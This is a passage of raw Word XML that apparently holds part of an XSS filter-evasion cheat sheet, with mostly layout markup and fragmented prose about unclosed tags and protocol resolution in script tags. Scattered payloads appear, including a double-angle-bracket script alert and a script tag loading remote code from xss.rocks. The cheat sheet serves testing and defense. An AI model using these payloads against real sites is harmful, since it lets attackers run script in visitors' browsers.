                            <a:ext cx="3026" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4619 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3026"/>
                              <a:gd name="T2" fmla="+- 0 364 182"/>
                              <a:gd name="T3" fmla="*/ 364 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3026"/>
                              <a:gd name="T6" fmla="+- 0 364 182"/>
                              <a:gd name="T7" fmla="*/ 364 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3026"/>
                              <a:gd name="T10" fmla="+- 0 363 182"/>
                              <a:gd name="T11" fmla="*/ 363 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3026"/>
                              <a:gd name="T14" fmla="+- 0 343 182"/>
                              <a:gd name="T15" fmla="*/ 343 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3026"/>
                              <a:gd name="T18" fmla="+- 0 340 182"/>
                              <a:gd name="T19" fmla="*/ 340 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3026"/>
                              <a:gd name="T22" fmla="+- 0 203 182"/>
                              <a:gd name="T23" fmla="*/ 203 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3026"/>
                              <a:gd name="T26" fmla="+- 0 182 182"/>
                              <a:gd name="T27" fmla="*/ 182 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4619 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3026"/>
                              <a:gd name="T30" fmla="+- 0 182 182"/>
                              <a:gd name="T31" fmla="*/ 182 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4640 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3026"/>
                              <a:gd name="T34" fmla="+- 0 203 182"/>
                              <a:gd name="T35" fmla="*/ 203 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4640 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3026"/>
                              <a:gd name="T38" fmla="+- 0 343 182"/>
                              <a:gd name="T39" fmla="*/ 343 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4622 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3026"/>
                              <a:gd name="T42" fmla="+- 0 363 182"/>
                              <a:gd name="T43" fmla="*/ 363 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4619 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3026"/>
                              <a:gd name="T46" fmla="+- 0 364 182"/>
                              <a:gd name="T47" fmla="*/ 36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026" h="183">
                                <a:moveTo>
                                  <a:pt x="30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005" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3026" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3026" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3008" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30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" name="Text Box 1269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81"/>
                            <a:ext cx="302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&lt;&lt;SCRIPT&gt;alert("XSS");//\&lt;&lt;/SCRIPT&gt;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68" o:spid="_x0000_s1167" style="position:absolute;margin-left:80.7pt;margin-top:9.1pt;width:151.3pt;height:9.15pt;z-index:-15703040;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,182" coordsize="302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">
                <v:shape id="Freeform 1270" o:spid="_x0000_s1168" style="position:absolute;left:1614;top:181;width:3026;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="302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2LEcgA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UKvYhuasFKdJXS0rJKL7UKehuy&#10;0yQ0Oxuy25j+e+cg9DbDe/PeN8v14BvVUxfrwAYeJhko4iK4mksD+6+38RxUTMgOm8Bk4I8irFe3&#10;N0vMXTjzJ/W7VCoJ4ZijgSqlNtc6FhV5jJPQEov2HTqPSdau1K7Ds4T7Rk+zbKY91iwNFbb0UlHx&#10;s/v1BkaPyR7c68ke/ehp2PbvdnP6sMbc3w3PC1CJhvRvvl5bJ/jTmeDKNzKCXl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/YsRyAAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABk&#10;cnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAjQMAAAAA&#10;" path="m3005,182l21,182r-3,-1l,161r,-3l,21,21,,3005,r21,21l3026,161r-18,20l3005,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3005,364;21,364;18,363;0,343;0,340;0,203;21,182;3005,182;3026,203;3026,343;3008,363;3005,364" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1269" o:spid="_x0000_s1169" type="#_x0000_t202" style="position:absolute;left:1614;top:181;width:302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lDZMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0Pywi9mY0eQo2uIqWCUCjGePA4zY7J&#10;YnY2ZldN/71bKPQ2j/c5y/VgW3Gn3hvHCqZJCoK4ctpwreBYbidvIHxA1tg6JgU/5GG9ehktMdfu&#10;wQXdD6EWMYR9jgqaELpcSl81ZNEnriOO3Nn1FkOEfS11j48Ybls5S9NMWjQcGxrs6L2h6nK4WQWb&#10;Excf5vr1vS/OhSnLecqf2UWp1/GwWYAINIR/8Z97p+P8WTaH32/iCX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lDZM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&lt;&lt;SCRIPT&gt;alert("XSS");//\&lt;&lt;/SCRIPT&gt;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No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Closing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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Tags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7904"/>
        </w:tabs>
        <w:spacing w:before="101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55040" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5283835</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="640715" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1264" name="Group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715" cy="116205"/>
                          <a:chOff x="8321" y="107"/>
                          <a:chExt cx="1009" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1265" name="Freeform 1267"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="8321" y="107"/>
                            <a:ext cx="1009" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 9309 8321"/>
                              <a:gd name="T1" fmla="*/ T0 w 1009"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 8342 8321"/>
                              <a:gd name="T5" fmla="*/ T4 w 1009"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 8339 8321"/>
                              <a:gd name="T9" fmla="*/ T8 w 1009"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 8321 8321"/>
                              <a:gd name="T13" fmla="*/ T12 w 1009"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 8321 8321"/>
                              <a:gd name="T17" fmla="*/ T16 w 1009"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 8321 8321"/>
                              <a:gd name="T21" fmla="*/ T20 w 1009"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 8342 8321"/>
                              <a:gd name="T25" fmla="*/ T24 w 1009"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 9309 8321"/>
                              <a:gd name="T29" fmla="*/ T28 w 1009"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 9330 8321"/>
                              <a:gd name="T33" fmla="*/ T32 w 1009"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 9330 8321"/>
                              <a:gd name="T37" fmla="*/ T36 w 1009"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 9312 8321"/>
                              <a:gd name="T41" fmla="*/ T40 w 1009"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 9309 8321"/>
                              <a:gd name="T45" fmla="*/ T44 w 1009"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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09" h="183">
                                <a:moveTo>
                                  <a:pt x="98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88" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1009" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1009" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="991" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98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" name="Text Box 1266"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="8321" y="107"/>
                            <a:ext cx="100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8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\&gt;&lt;/SCRIPT&gt;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65" o:spid="_x0000_s1170" style="position:absolute;left:0;text-align:left;margin-left:416.05pt;margin-top:5.35pt;width:50.45pt;height:9.15pt;z-index:-17661440;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="8321,107" coordsize="100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">
                <v:shape id="Freeform 1267" o:spid="_x0000_s1171" style="position:absolute;left:8321;top:107;width:1009;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="100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iwRsUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBCF78L+hzALe9PULop0jSKKsAcP2roHb0Mz&#10;tsVmUppsrf56IwjeZnjve/NmvuxNLTpqXWVZwXgUgSDOra64UHDMtsMZCOeRNdaWScGNHCwXH4M5&#10;Jtpe+UBd6gsRQtglqKD0vkmkdHlJBt3INsRBO9vWoA9rW0jd4jWEm1rGUTSVBisOF0psaF1Sfkn/&#10;TagxuX/vtzGZ7lRFdNrsd9lf6pT6+uxXPyA89f5tftG/OnDxdALPb8II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eLBGxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m988,182r-967,l18,182,,161r,-3l,21,21,,988,r21,21l1009,161r-18,21l988,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="988,289;21,289;18,289;0,268;0,265;0,128;21,107;988,107;1009,128;1009,268;991,289;988,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1266" o:spid="_x0000_s1172" type="#_x0000_t202" style="position:absolute;left:8321;top:107;width:100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bXFsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TfVQ1moUERcWBNnaPexxbMY2&#10;2ExqE7X77zcLC97m8T5nteltIx7UeeNYwWyagCAunTZcKfgq3idvIHxA1tg4JgU/5GGzHg5WmGn3&#10;5Jwep1CJGMI+QwV1CG0mpS9rsuinriWO3MV1FkOEXSV1h88Ybhs5T5JUWjQcG2psaVdTeT3drYLt&#10;N+d7czueP/NLbopikfAhvSo1HvXbJYhAfXiJ/90fOs6fpy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bXF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8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\&gt;&lt;/SCRIPT&gt;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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firefox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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1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Gecko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>actually</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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the</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>portion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="63" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="176"/>
      </w:pPr>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>assumes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>safe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close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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag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add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>closing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tags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you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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thoughtful!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Unlike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one,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>effect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firefox,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require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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additional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotes</w:t>
      </w:r>
      <w:r>
        <w:rPr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to,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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they're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needed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>generally,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>although</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>beware,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idea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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HTML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end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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looking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injected:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2237740" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1261" name="Group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7740" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="3524" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1262" name="Freeform 1264"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="166"/>
                            <a:ext cx="3524" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5117 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3524"/>
                              <a:gd name="T2" fmla="+- 0 349 166"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3524"/>
                              <a:gd name="T6" fmla="+- 0 349 166"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3524"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3524"/>
                              <a:gd name="T14" fmla="+- 0 328 166"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3524"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3524"/>
                              <a:gd name="T22" fmla="+- 0 188 166"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3524"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5117 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3524"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5138 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3524"/>
                              <a:gd name="T34" fmla="+- 0 188 166"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5138 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3524"/>
                              <a:gd name="T38" fmla="+- 0 328 166"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5120 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3524"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5117 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3524"/>
                              <a:gd name="T46" fmla="+- 0 349 166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24" h="183">
                                <a:moveTo>
                                  <a:pt x="3503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3503" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3506" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3503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" name="Text Box 126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6"/>
                            <a:ext cx="352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4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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId20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http://xss.rocks/xss.js?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B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62" o:spid="_x0000_s1173" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:176.2pt;height:9.15pt;z-index:-15702528;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="352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">
                <v:shape id="Freeform 1264" o:spid="_x0000_s1174" style="position:absolute;left:1614;top:166;width:3524;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="352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o6t8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvDMAyF74P+B6NBb6szQ7OS1i2hMNod1w12VWMt&#10;CbPlEHtJ2l8/Dwq9Sbz3PT1tdpOzYqA+tJ41PC8yEMSVNy3XGj4/Xp9WIEJENmg9k4YLBdhtZw8b&#10;LIwf+Z2GU6xFCuFQoIYmxq6QMlQNOQwL3xEn7dv3DmNa+1qaHscU7qxUWZZLhy2nCw12tG+o+jn9&#10;ulTDdi/nr8Ngy3N+zblUb06NS63nj1O5BhFpinfzjT6axKlcwf83aQS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KOrfEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3503,183l21,183r-3,-1l,162r,-4l,22,21,,3503,r21,22l3524,162r-18,20l3503,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3503,349;21,349;18,348;0,328;0,324;0,188;21,166;3503,166;3524,188;3524,328;3506,348;3503,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1263" o:spid="_x0000_s1175" type="#_x0000_t202" style="position:absolute;left:1614;top:166;width:352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F0jsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin0VjdaCBrdiEgLhYI0xkOP0+wk&#10;WczOxuxW03/vFgRv83ifs1qPthNnGrxxrGA6SUAQV04bbhQcyveXOQgfkDV2jknBH3lY548PK8y0&#10;u3BB531oRAxhn6GCNoQ+k9JXLVn0E9cTR652g8UQ4dBIPeAlhttOzpIklRYNx4YWe9q2VB33v1bB&#10;5puLN3Pa/XwVdWHKcpHwZ3pU6vlp3CxBBBrDXXxzf+g4f5a+wv838QS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RdI7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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="34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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId21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http://xss.rocks/xss.js?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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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B</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Resolution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Script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tags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3" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>particular</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>variant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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submitted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Łukasz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Pilorz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based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>partially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>off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Ozh's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>resolution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
